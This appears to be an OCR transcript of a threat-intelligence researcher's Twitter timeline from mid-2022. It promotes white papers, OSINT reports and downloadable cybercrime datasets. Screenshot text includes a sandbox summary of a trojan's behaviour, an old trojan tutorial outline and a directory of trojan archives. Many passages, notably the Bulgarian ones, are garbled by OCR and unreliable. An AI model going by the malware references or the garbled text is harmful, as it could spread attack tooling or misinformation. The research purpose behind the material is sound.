The Koobface Gang Makes a Comeback - An In-Depth OSINT Enrichment Analysis in 
2022 - https://t.co/2X6tUKSG42 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatIintel #Threatintelligence 
https://t.co/lu8diq9geA 
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30 - Thursday 


03:49 


Who has a valid Maltego license free time OSINT capabilities and want to jump in with 
me for a collaborative session and do some research? DM or reply. For starters here’s 
a direct link to my Maltego SNA of Iran’s Hacker scene - https://t.co/6NOvD45fM8 
https://t.co/OTWPgeKkOt 
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July 


1 - Friday 
06:18 


My latest white paper for @whoisxmlapi - https://t.co/80QjniS8sn #Threatintelligence 
#Threatintel 


2l 


06:32 


Happy searching! - https://t.co/Teu6CSTcR) I’ve just launched my search engine for 
hackers security bloggers OSINT analysts and threat intelligence analysts which is a 
project that | intend to continue maintaining with high quality resources. Enjoy! 
https://t.co/fqsk33SCdr 
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Cyber Security OSINT and 
Threat Intelligence Search 
Engine 


[ 


@ Text Wlmages more options. 


08:16 


My latest white paper for @whoisxmlapi - "An In-Depth OSINT and Technical Cyber 
Attribution Analysis of Cytrox’s Predator Lawful Surveillance Malicious Software - An 
OSINT Analysis " - https://t.co/AS5vK13c8U Enjoy! 


21 *%4 
13:32 
@GirlsCanInvest2 Just followed you back. Feel free to DM me. Regards. Dancho 


18:50 


https://t.co/nZhOtkTGh] #security #cybercrime #malware #ThreatIntelligence 
#threatintel 


6 - Wednesday 


13:23 


Stay tuned for the Second Edition of my Cyber Intelligence Memoir which will be 
made exclusively available in Bulgarian. Grab the first edition here - 
https://t.co/qLxz4GuRip [PDF] or at @Cryptome_org - https://t.co/6V8O0FTdlSv [PDF] 
Stay tuned! https://t.co/B80Ir5H6RK 
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13:25 


Time to Say Goodbye! - https://t.co/53IQDfirtL #security #cybercrime #malware 
#cybersecurity #CyberAttack #CyberSecurityAwareness #ThreatHunting 
#Threatintelligence 
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8 - Friday 


12:43 


Stay tuned! Grab the first version from here - https://t.co/qLxz4GuRip 
https://t.co/mob5nasRg3 
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14 - Thursday 


02:00 
My latest white paper for @whoisxmlapi - https://t.co/qOyv9cv2GZ Enjoy! 


02:03 


Toky Wo nyOnukyBax BTOPOTO U34aHue Ha MOA MemoOap "Kubep Pa3y3HaBaHe" KOeTO 
e Ha Beyirapcku uv KOeTO MOxeE Aa CBanMTe TyK - https://t.co/Md62bupaj9 [PDF] 
KaKTO U ayAuo KHUWra KOATO MOE Aa CBanuTe OT TyK - https://t.co/zrqg1SmIrf [MP3] 
No3gapasu! Manyo. https://t.co/T6XdIEqxUh 
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Grab a copy of my latest E-book memoir in Bulgarian from here including the actual 
audio book for free from here - https://t.co/TcRUHAMAIY Enjoy! #security #cybercrime 
#malware #Threatintelligence #ThreatHunting #Threatintel https://t.co/HzBeSBfwwB 
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10:49 


My latest white paper for @whoisxmlapi - https://t.co/mjzvh5Rr66 Enjoy! #security 
#cybercrime #malware #Threatintelligence 


21 *%2 

12:35 

In the countryside in Bulgaria. #security #cybercrime #malware #Threatintelligence 
https://t.co/6HqsluaJUn 
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15 - Friday 


13:08 


Who wants access to my STIX/STIX2/TAXII feed? Check out the home page here - 
https://t.co/OmUajqR2uy a sample Conti #ransomware loCs in STIX format - 
https://t.co/HiYrrilfRaH and drop me a line at dancho.danchev@hush.com in case you 
want GUI access. Enjoy! https://t.co/v4tCW5CmKs 
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14:08 
https://t.co/neqeZDCmc7 #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:13 
https://t.co/jQkJq6fJgm #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:13 
https://t.co/MW9HpiCxAB #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:18 
https://t.co/nNsXMPa4Tq #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:20 
https://t.co/TjmRcm6G4] #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:21 


https://t.co/uvAt5h1kKt8 #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 


*1 
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14:22 
https://t.co/39JWq8cJDL #security #cybercrime #malware #cyberattacks 
#cybersecurity #CyberAttack #ThreatHunting #Threatintelligence 
14:36 


Takes you back doesn’t it? - https://t.co/JByl930BiK Interview here - 
https://t.co/W6I8KSHY7B [MP3] Here’s the latest - https://t.co/2X6tUKB4Fs ; 
https://t.co/AZAws4LZg0 Enjoy! #ThreatHunting #ThreatIntelligence 


14:49 


Folks. Grab a free direct download of my Cybercrime Forum Data Set for 2021 which 
is 98GB here - https://t.co/jSWJywedIX and feel free to drop me a line at 
dancho.danchev@hush.com just to say "hi" or in case you’re hiring contractors. 
Regards. Dancho https://t.co/fD7vcbYA0O 
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14:51 


Folks. | guess I’m "keeping it coming". Here’s a direct download link for my 
Cybercrime Research USB Compilation which is 78GB - https://t.co/IdtK35i5Te Enjoy 
and drop me a line at dancho.danchev@hush.com in case you’re hiring contractors. 

Regards. Dancho https://t.co/rVc9WGCUnlI 
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14:56 


Folks. Here’s a direct download link for my compilation of source code and tools 
obtained using technical collection for research purposes - https://t.co/NgagnWj86a 
enjoy and drop me a line at dancho.danchev@hush.com in case you’re hiring 
contractors. https://t.co/snZfubfUiW 
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14:57 


Who needs or wants fresh and raw information on Iranian Cyber Threat actors in the 

form of crawled personal Web sites for research and data mining purposes including 

OSINT and technical collection enrichment? Here’s the link - https://t.co/VtdZPcd1dJ 
https://t.co/NAnFXkCsV5 
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15:00 


Here’s a direct download link on Part Two of my Iranian Cyber Threat Actors OSINT 
and data mining research compilation - https://t.co/7Ro2JFIKJY Enjoy and drop me a 
line at dancho.danchev@hush.com in case you're hiring contractors. Regards. 
Dancho https://t.co/NrEgQzUuOqO 
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15:03 


Who needs free access to fresh and recently processed 230 pages report on various 
international cyber threat actors? Here’s the link - https://t.co/SMDjScL7YB Enjoy! 
Drop me a line at dancho.danchev@hush.com in case you're hiring contractors. 
Regards. Dancho https://t.co/peg27bFKe5 
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18 - Monday 


05:18 


At the seaside in Bulgaria. Vacation time has come! I'll be back online in full speed in 
terms of research on Thursday. Stay tuned! #security #cybercrime #malware 
#CyberAttack #cyberattacks #cybersecuritytips #Threatintelligence #Threatintel 
#threathunting https://t.co/n6CoOCiP7n 
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15:06 


Celebrating my mother’s birthday anniversary at Bulgaria’s seaside. I'll be back full 
time online in terms of research on Thursday. Stay tuned! #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence https://t.co/2vTY2tiDIO 
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15:52 


Who wants to join me in a public XMPP/Jabber Conference Room where | intend to 

host live Q&amp;As in terms of my research and offer general OSINT/cybercrime 

research/security blogging/threat intelligence analysis? - https://t.co/qOjVJPBkKWU 
https://t.co/HTVrkxxG7I 
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15157 


ANPP 


Folks. Is anyone using SilentCircle? What’s your user ID? Regards. Dancho 
https://t.co/y4111j4f4c 


16:10 


Anyone using Threema? What’s your user ID? Regards. Dancho 
https://t.co/CD14V744sb 


2 


16:39 

https://t.co/TcRUHAMAIY #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #threathunting #threatintelligence 

16:48 


My latest white paper for @whoisxmlapi - https://t.co/PTpyyXmafo #security 
#cybercrime #malware #CyberAttack #CyberSec #Threatintel #threathunting 
#threatintelligence 
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19 - Tuesday 


05:41 


Awesome! I'll be back on Thursday in terms of research. Stay tuned! 
https://t.co/1LBAdrIWAWG 


09:15 
Check out my latest white paper for @whoisxmlapi. Enjoy! https://t.co/ovUsIENHXh 


09:16 
Check out my latest white paper for @whoisxmlapi. Enjoy! https://t.co/OHiBndMRfu 


21 - Thursday 


09:14 


My latest white paper for @whoisxmlapi - https://t.co/A9ePkKOUNCf #security 
#cybercrime #malware #CyberSecurity #CyberAttack #cybersecuritytips 
#CyberSec #CyberSecurityAwareness #cyber_ security #ThreatHunting #threatintel 
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13:14 


Anyone hiring security bloggers? #security #cybercrime #malware #CyberSec 
#CyberAttack #cyberattacks #CyberSecurityAwareness #ThreatHunting 
#threatintelligence #threatintel 


22 - Friday 


00:17 


At the seaside. Bare with me. I’m coming back online full time tomorrow in terms of 
research. Regards. Dancho https://t.co/gUtt4JLGAp 


02:46 


My latest white paper for @whoisxmlapi - https://t.co/QCnBUhWvzsS #security 
#cybercrime #malware #CyberAttack #cyberattacks #CyberSec #cybersecuritytips 
#CyberSecurityAwareness #ThreatHunting #threatintelligence #threatintel 


09:20 
Happy Friday! https://t.co/ZjYR3xAN32 
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23 - Saturday 


10:59 


Cheers! https://t.co/VkKBZxOc2PN 
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24 - Sunday 


07:11 


Did you know that Bruce Starling quoted me once - "Speaking of which: whatever 
happened to Dancho Danchev? Bulgarian white-hat ultra-hacker just kinda 
evaporates without a word? No return address for Dancho? What gives with that?" - 
https://t.co/JFJSQEBnf} 


26 - Tuesday 


10:07 


New post - "Basics of OSINT in the Context of Fighting Cybercrime - The Definite 
Beginner’s Guide" - https://t.co/48TOCtxtLN #security #cybercrime #malware 


884 


#ThreatHunting https://t.co/kCdTvuwSLE 


Figure 2. Intelligence Discipline Integration 


27 - Wednesday 


23:21 


My latest white paper for @whoisxmlapi - https://t.co/SR5ivFuhrb #security 
#cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 


29 - Friday 


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #ThreatIntelligence 
#Threatintel https://t.co/O2CIYVWPJO 
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Welcome to the community-driven and commercial WhoisXML AP! 
OpenCTI instance where we aim to offer a novel and unique peek 
inside the modern threat landscape on a daily basis through the 
machine-readable communication of novel attack techniques 
including TTPs (Tactics Techniques and Procedures) including all 
the relevant and real-time processed loCs (Indicators of 
Compromise) for current and ongoing cyber attack campaigns and 


currently circulating malicious software spam and phishing 
campaigns spreading rogue and fraudulent online campaigns. 
Inquire about your API key here - https://threat- 
intelligence.whoisxmlapi.com/nautilus-feed or send a message to 
research@whoisxmlapi.com 


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/oqzIROXSFk 
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06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/TUjwYFXjjo 


High Risk Trojan 
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Scan Bypass Configuration Cloud Query, AV Scan 
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» More Details 


» Behavior Summary 
This file dropped files 
This file deleted files 
This file had no window or its main window is hidden 
This file applied autostart registry modifications to start itself automatically 


This file spawned process(es) 
» Analysis Details 
(B Packer N/A 
(B File Type exe 


@& Downloaded From unnamed _collection_09 zip/412/2cb48629 3af74d169dac5aa09e0c779e~ 


(GRR ven | wanzxcove MRE 
(@® Captured Packets ® Original File @® Tracer Package | @® Tracer Log 


w Suspicious Behaviors (4) 


Executable drop a copy of itself 


Suspicious file installed in system folder 
Suspicious registry 
The executable tries to inject a PE image to other processes 
» Code Emulation (1) 
» Files Created (7) 
» Files Deleted (4) 
» Launched Processes (3) 
» Registry Changes (1) 


06:13 


https://t.co/n6LihftIm3 #security #cybercrime #malware #Threatintelligence 
#Threatintel https://t.co/Y514jfAyl6 
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August 


1 - Monday 


10:05 


https://t.co/tW2LuSxdSi [PDF] #ThreatHunting #ThreatIintelligence #Threatintel 
https://t.co/2NuwUri96G 
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9 - Tuesday 


09:36 


https://t.co/JT676NfPZI [PDF] #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #CyberSecurityAwareness #cyberwar #ThreatHunting 
https://t.co/NuipVoECfU 
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12:42 


Psst - it appears that I’ve been unknowingly doing hunt forward missions for the U.S 
since practically the beginning of all time. Stay tuned! - https://t.co/JTcqOaYgET 
#security #cybercrime #malware #CyberAttack #cybersecuritytips 
#Threatintelligence https://t.co/WqwMSbyrue 


12:54 


You know you’re popular when they say "hi". - https://t.co/mQWkOSpiqY 
https://t.co/h5WQkzg4Wh 
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¥ Bulk Register 3 payment OT27/72008 08 © Stet apply fee soxbesuty net 
¥ List My Domains 4 payment OT 27/2008 7.99 net domain registration fee scxbesuty net 
¥ Get Auth-Code 5 payment o7N7/2007 7.49 Doman Renewal Fee dstat org 
¥ Registrar Transfer 
6 Sepose 07/17/2007 25.0 e-banking wanster from bank 
¥ Account Transfer 
¥ ONS-OIY 7 payment 07/17/2007 073 payment processing tee ec 
¥ Add Funds & payment 07/17/2007 7 Doman Renewal Fee jabd.org 
¥ © Shield s payment 0312/2007 499 © Sheu apply fee ronnetwork com 
¥ Order SSL Cent 10 payment 03132007 4.99 O Shietd apply fee akimen.com 
¥ Domain Monetining Service 
apni M2 poges totst:11 records [725] (FB (os) 
Check Doman FAQ Suanort Wheis Helpdesk What's New a 


Forose 


12:57 
https://t.co/ozDt3GP916 https://t.co/fBrZ8E7nf5 


QAHC.bg G@dansbg - 4h 
@PavlikMorozovBG @svetlinco 0 AoknagBaH e, VMaMe VM CHMMKa axe. 


® View conversation 


= PIAHC.bg added you to list dansbg/Bankepuetata 


12:58 
https://t.co/ozDt3GP916 https://t.co/X4xFaduiTz 
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@dansbg 


Account suspended 


Twitter suspends accounts which violate the Twitter 
Rules. Learn more 


12:58 
https://t.co/ozDt3GP9l6 https://t.co/JqGQk9h9Tz 
LispetaH LipetaHos @istsvetanov - Nov 25, 2009 
@tsvetanov @cvetanov @ceco B3exTe Nu paspeweHue OT @dansb¢g 3a Tua 
VMeHa? Kak Me HaTVpuxte C TOBa tstsvetanov He e UCTUHa... 
12:58 


https://t.co/ozDt3GP916 https://t.co/YivtUJojnw 
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13:00 


OGABABaAME KOHKYPC 3a QOHOCHHUM. Npawante CV Ha 
jobs@dans.bg OT CHumka HAMa HyKQa, HME BH 3HAeM KOM CTE 
1:24 AM Oct 26th from web 


@boiko - Wie s3emem He Ja sakpuwem Te, OTKONKOTO TH HaC :) 
1:14 AM Oct 26th from web in reply to boiko 


Vimannu cme Ha wat Gnorepyeta. MbK Hue Qa HE 3Haem. JoGpe, ye 
WMa @HOHMMHM CHrHanH Ha Calta HH | 
4:11 AM Oct 19th from web 


@komitata nucan Ha Gnora cu 3a HawMTe NbBOBE? Xa Taka, A 
ytpe 6 7.45 6 CTan 18. He Tu € 3a NbpsSH NDdT... 
4:11 AM Oct 19th from web 


@sergeystanishev - A Aa Te Bugum uM TeGe, MOTO MOMYE. YTpe B 
7.30 Ha Kaqbenue 6 CTan 408. 
3:29 AM Oct 16th from web 


@lsetska - MaHc He BHHArH 3Hae, rocnoxKO NpeueAaTeN, 3aTea 


NuTaMe WNK fa 3EMEM APyrh MEPKHM, KONA fa NpatTum, kKadenye vet 
3:28 AM Oct 16th from web in reply to tsetska 


@boiko - vakame, yaxameeee. 
2:46 AM Oct 16th from web 


@tsetska - A, TH Kora We HM AOKNagBaw? A ugsaii Gbp30 Aa ce 
Aenosupaw TyK 
2:39 AM Oct 16th from web 


@bibliata - Ma He AoWQem Hue Aa Te 3aGneN ... 
2:38 AM Oct 16th from web 


HAKaKBO MOMYeHLE HM Hapitua Gans'ing stars. XM, Qa He B3eEMeM 
fia 3aTaHuyBame, Ye ... 
2:25 AM Oct 16th from web 


Xa, Cbpsbpa Hu 3a6u. A 6bp30 mapwi OT MHTepHeTa W3epyeTa 
Takvea, Mapu 84 Ka3Bam. La 3a6uBaTe, AaAA 


2:10 AM Oct 16th from web 


Beye cv mame Caiit - nttp://dans.bg 
2:09 AM Oct 16th from web 


https://t.co/JTcqOaYgET https://t.co/zqNcljq|ljf 
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EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 


13:00 


https://t.co/JTcqOaYgET https://t.co/ttddrkt7mP 
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Dancho Danchev Presents! Brace Yourselves! 


= 


Grab today a free copy of the Second Free. 

Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica gongstion Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This iS 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


" 


Commercial Copy Available! A proach me toda} 
ppprnec yo r Manager today' Empower your Threat 
intelligence Team! An OSINT Conducted Today Is a 
Tax Payers Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


13:00 
https://t.co/JTcqOaYgET https://t.co/GYEbexUH7t 
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ZPNet Search : 


Home my ogs s White Papers Downloads Popular 


Ryan Naraine, Dancho Danchev & Adam O'Donnell 
% Mote (ass OB tmat sens Hi tucks Hi oe 


ZDNet Must Read: 
Code execution flaws haunt OpenOffice 
The flaws, which affect al versions price to OpenOffice.org 2.4.2, could be 


exploited via manioutated WMF and EMF files in StarOffice or StarSute 
documents ortirmed » 


October 30th, 2008 
Happy 20th birthday, internet worm! 


Categories: \nice 
Tages lnternet va: 
Adam ODasse 


aly 5 TalkBacks 


partner Master Data Management 


This weekend marks the 20th anniversary of the Internet Worm, the first 
major worm that propagated on the Internet. Even though many years 
have passed and undertying meda has chanped. worms are stil able to 
wreak haves and keep system adrerestrators up at right. Today the 
damage done by worms is far less visible and far less newsworthy but far 
more Gtficut to repair than in the past 


Read the rest of this entry » 


October 30th, 2008 
Phishers apply quality assurance, start 
validating credit card numbers 


head 


OO WROUMIR 


Categories: broners Laan aod 
Tope iecwits Queit: Assurance Pha 


adv aTakBak -S ¢ Sponsored Links 


13:01 
https://t.co/JTcqObfRwr https://t.co/h36qHII233 
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13:01 


https://t.co/JTcqOaYgET https://t.co/vWtVRdAf2} 
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13:01 


eh ee eh teh ee eh ee ee ee lteeeetetee 


|The Complete Trojans Text | -------- [Written On| 
| (Security Related) | 

|by tHe MaNiAc | |3.04.2000 | 
[contact me at: themaniac@blackcode.com |-------- lthetetetes | 
|maniac@forbidden.net-security.org I 


| <P ata te tebe t abate tate tebe be tebe tebe teda be | 


This guide is for educational purposes only I do not take any responsibility about anything 

happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision. 
If you want to put this text om your Site/FTP/Newsgroup or anything else you can do it but don't 
change anything without the permission of the author.I"ll be happy to see this text on other pages too. 


All copyrights reserved.You may destribute this text as long as it’s not changed. 


Pee ee ee ee eee ee ee ee 


Author Notes: 


I hope you like my texts and find them useful. 

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like 
“I want to hack the US government please help me” or “Tell me how to blind a trojan into a .jpg” 
“WHere can I get a portscanner™ etc...... 

Be sure if I con help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I‘ll try to cover 

much more topics in ay future texts and I want to thank to all of the people that like ay 

texts. 


Pee ee ee ee ee ee ee 


Here you can find other texts \ 
written by me or other friends: \ 
http://www. blackcode.com / 
blecksun.box.sk / 
neworder . box. sk / 


| 
|-1.What Is This Text About? \ 
|-2.What Is A Trojan Horse \ 
|-3.Trojans Today \ 
|-4.The future of the trojans \ 
|-S.Anti-Virus Scanners \ 
|-6.How You Can Get Infected? \ 


|----- From Attachment \ 

|----- From Physical Access \ 

|----- From Trick \ 
|-7.How Dangerous A Trojan Can Ge? ‘ 
|-8.0ifferent Kinds Of Trojans \ 
|----- Remote Access Trojans \ 
|----- Password Sending Trojans \ 
|----- Keyloggers \ 

| -<-<- Destructive Trojans \ 
|--+--- FTP Trojans \ 
|-9.Who Can Infect You? \ 


900 


135;01 
https://t.co/JTcqOaYgET https://t.co/PHulGz07pxX 


GRIEFER 


OW, oon 
SUCK MY DICK 


13:01 
https://t.co/JTcqOaYgET https://t.co/Vz30KggdOx 
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13:02 


https://t.co/JTIcqOaYgET https://t.co/35aYPohZ23 
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13:10 


o Parent Directory 
Cyn1.2.zip 
Fri.55lite.zip 
Fri.56lite.zip 
Gift2.1.1.zip 
Homeunix1.@.zip 
Honeypoti.1.zip 
MantisBeta2.zip 
Metal2.7.zip 
Olive2.4.zip 


OptixGW.zip 


input.rar 
nerte722.rar 
nerte733.rar 
nerte74.rar 


nerte7S.rar 
] ptakks21.exe 


rembomb.rar 


revengor.rar 


rnsfire.zip 


rnstick.zip 


ey) op or Sr IS Cee 9 be ee eo or 


https://t.co/JTcqOaYgET https://t.co/LrSIWVEMIY 


Psychofiles1.8.zip 


fatalconnection2@.rar 


rnsuploadtrojan.zip 
skyrat.rar 


17-Apr-2002 13:06 = 
@5-Dec-20@1 15:44 124k 
@5-Dec-20@1 15:55 207k 
@5-Dec-20@1 15:56 5@k 
@5-Dec-2001 16:02 314k 
@5-Dec-2001 16:04 224k 
@5-Dec-2001 16:08 185k 
@5-Dec-20@1 16:09 128k 
@5-Dec-2001 16:11 211k 
@5-Dec-2001 16:25 145k 
@5-Dec-2001 16:25 35k 
@5-Dec-2001 16:28 623k 
@5-Dec-2001 16:00 734k 
@5-Dec-2001 16:09 2k 
@5-Dec-2001 16:15 798k 
@5-Dec-2001 16:23 798k 
@5-Dec-2001 16:57 1.1M 
@5-Dec-2001 17:12 1.1M 
05-Dec-2001 16:31 
@5-Dec-2001 16:32 10k 
@5-Dec-20@1 16:36 192k 
@5-Dec-2001 16:36 11k 
@5-Dec-2001 16:37 131k 
@5-Dec-2001 16:38 11k 
@5-Dec-20@1 16:44 362k 


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 


Views 


150K 
125K 
100K 

75K 


Jan 2011 


Jan Jan Jan 
2012 2013 2014 


Jan 
2015 


Jan Jan 
2016 2017 


Jan 
2018 


Jan 
2019 


9.36M 
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23:15 
https://t.co/TCcRUHAMAIY https://t.co/ARAqV3Mmtf 


S “Kon tf paxTo p 6 Por 
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Z Msg Pe Par n so TO eH 
6 Ap Port naenws exéte p 
H PIRES oe Hay Hw tog OM a1 ba 
AS: ih yOu Ht HP ASTOR Math ™ 

a Cc) . . . ) . f 

/yuactBpan B CTpoPro CewperHna 
npoppamMa 3a MaKe pH Ha 


BpuArantcKo Pasy3HaBaHe 
LOAAbBpkKka+Hah 7H3BECTHHSA 


OT0T 3&8 CHE YpHOCT H KUHOGEDp 


aTaRou~’ B CBCTA 


"Tosa ¢ monce Ou nati-exuamennus beazapcwxu 6Gao0zep 
@ céecmoecéen Ma mat 6 egepama Ha mexnuvweckKa 


cCaeyphocm™ 


17 - Wednesday 


07:10 
Chilling out. https://t.co/(MMm2IlpNOO 
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23:14 


https://t.co/qLxz4GuRip [English PDF] https://t.co/kjEQQOvQGc [Bulgarian PDF] 
https://t.co/P9AfFAOWVQgxX [Audio Book in Bulgarian MP3] https://t.co/YwOcYe3ZnO 


*1 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


19 - Friday 


08:20 


Cheers to all my friends and colleagues internationally. Keep up the spirit and try to 

contribute for a better good. | have several big projects and initiatives coming my 

way so stay tuned and catch up at https://t.co/JTcqObfRwr Stay tuned! #threatintel 
https://t.co/UrAGSEo22L 


*1 
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24 - Wednesday 


04:49 


https://t.co/JTcqOaYOur https://t.co/vjtZFqSijB 
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04:49 


https://t.co/JTcqObfRwr https://t.co/cP58JaVi9s 
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04:49 


https://t.co/JTcqObfRwr https://t.co/MNG60va9m2 
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Background 


| was born in Sofia, Bulgaria. My primary area of 
occupation since the early 90's is computers. My 
— work is Disruptive individual's Chief 
xecutive Officer (CEO) 
FR 
Peet A ed 
Tecate Mees EY 


Dancho 
Danchev Executive BIO 


Warlndustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for processing threat intelligence leading to a successful set of 
hundreas of high-quality anaysis and research articles published at the industry's leading threat intelligence blog - 
ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, CNN, PCWortd, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H+Magazine currently producing threat intelligence at the industry's leading threat intelligence 
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge 


With his research featured at urope, Camp, InfoSec, GCHQ and Interpol the researcher continues to 
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - 
MinStreams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research 
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe 


09:22 
https://t.co/JTcqOaYOur https://t.co/Pn4baJUop5 
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09:23 


https://t.co/JTcqObfRwr https://t.co/vV6Sr0eRgE 
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09:29 


https://t.co/JTcqObfRwr https://t.co/rfNwZSZiPc 
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09:30 
| used to cook in a previous life. Check these out! https://t.co/mlezNL2mq0O 


*1 
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09:33 


https://t.co/3OEtozirl3 https://t.co/fHwRCfJA0d 
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09:33 


https://t.co/3OEtoyJi6V https://t.co/JXTvjljGsV 


09:36 
https://t.co/JTcqOaYOur https://t.co/Y84TdFZjuh 


@} otner details 


® Analysis of the file resources indicate the following possible country of origin: 


Russian Federation 


@ The HOSTS file was updated with the following URL-to-IP mappings: 


a 
« 
All content (“Information”) contained in thes report is the copyrighted work of Threat Expert Ltd and its associated companies (“ThreatExpert”) 


ThreatExpert 
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09:37 
https://t.co/JTcqOaYOur https://t.co/tnTFpTNRNI 


*1 
DDanchev 
Rained 
On My 
Scareware 
Campaign 
09:40 


https://t.co/JTcqOaYOur https://t.co/8sCpnzx9c3 
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09:49 
https://t.co/JTcqObfRwr https://t.co/iqodJBjJ6Nk 
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09:54 
https://t.co/JTcqObfRwr https://t.co/WZIBKu6fk2 
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= LOVELY HORSE @ 
@lovelyhorse ourer sence 


322 


= 
2 
Ss 
= 
= 
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5 
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https://t.co/JTcqObfRwr https://t.co/omSFVBWD19 
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09:54 


py Papa 


09:54 
https://t.co/JTcqObfRwr https://t.co/McThMmmHaT 
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09:54 


https://t.co/JTcqOaYOur https://t.co/MurN|IxYCKu 
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09:55 


https://t.co/JTcqOaYOur https://t.co/70x4xfe3Db 
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09:55 


https://t.co/JTcqOaYOur https://t.co/WaB5dv5GFq 


GO ncbe 


v f Yo 
www.cybercamp.es 


26 - Friday 


05:09 


Folks. | have a Dark Web Content empire project with multiple blogs on multiple 
topics coming my way. Do you enjoy my blog? Check out the Dark Web version here - 
https://t.co/Pr43QvsjCY and stay tuned for the related blog URLs here. Enjoy! 
https://t.co/K5IrfpoKBj 
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— as ea 


Dancho Dank 
dancho.danchev@hush.com + Donate BitCoin - belgqrs9vq6xns7azpfruhvd6jthkyx2samixunxd6y 


—— 


Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - 
be lqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y 


Archives 


i 


Categories 


05:12 


Everything that you donate here will go for research purposes and all the traffic that | 
can get on the Dark Web will greatly motivate me to launch new blogs part of my 
content empire network and continue to do my research. https://t.co/Pr43QvsjCY 

Enjoy! https://t.co/3mY4yvZ3zL 
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Dancho Danchev's Dark Web Medi: 1 Empire= r S Inte dike nce Communily’2.0=Emaik 
dancho.danchev@hush.com = Donate BitCoin - belqrs9vq6xns7azpfruhvd6jthkyx2sanixunxd6y 


— 


Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - 
belqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y 


Archives 


Categories ines 


20:55 


https://t.co/HWOd2yR6J8 #security #cybercrime #malware #cybersecuritytips 
#cyberattacks #threatintelligence #ThreatHunting #threatintel 
https://t.co/yC4jab2gsV 
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Dancho Dank 
dancho.danchev@hush.com + Donate BitCoin - belgqrs9vq6xns7azpfruhvd6jthkyx2samixunxd6y 


—~ 


Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - 
be lqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y 


Archives 
& 
; Y 
Categories leeae 


27 - Saturday 


20:55 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cybersecuritytips 
#cyberattacks #CyberSecurityAwareness #ThreatHunting #Threatintelligence 
#threatintel https://t.co/DBQCN7GArY 


*1 
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Table 9: Quality of selected intelligence sources (10 out of 45) 


% of % of % of 

Blog ; covered ly robust 
iocterms 10Cs 
Dancho Danchev 84% 
Naked Security 45% 
THN 51% 
Webroot 84% 
ThreatPost 29% 
TaoSecurity 68% 
Sucuri §2% 
PaloAlto 87% 
Malwarebytes 72% 
Hexacorn 76% 


20:57 
Stay tuned! https://t.co/JTcqOaYgET https://t.co/kelkOPEAby 


Dancho Danchev Presents 


The International 
QSINT Journal 
Compilation on 

Online | 


Hate and ed 
Social M 5 


Thee Definite OSINT and Actionable Threat Intelligence 
Compilation Guide to Assist Law Enforcement and the U.S 
Intelligence Community Internationally 


Dancho Danchev 


https://ddanchev.blogspot.com Email: dancho.danchevehush.com 
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29 - Monday 


04:09 
My latest white paper for @whoisxmlapi - https://t.co/A9ePkKOUNCf Enjoy! 


05:13 


https://t.co/2U427m48jE #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #cyberattacks #CyberSecurityAwareness #Threatintelligence 
#ThreatHunting #Threatintel 


1115 


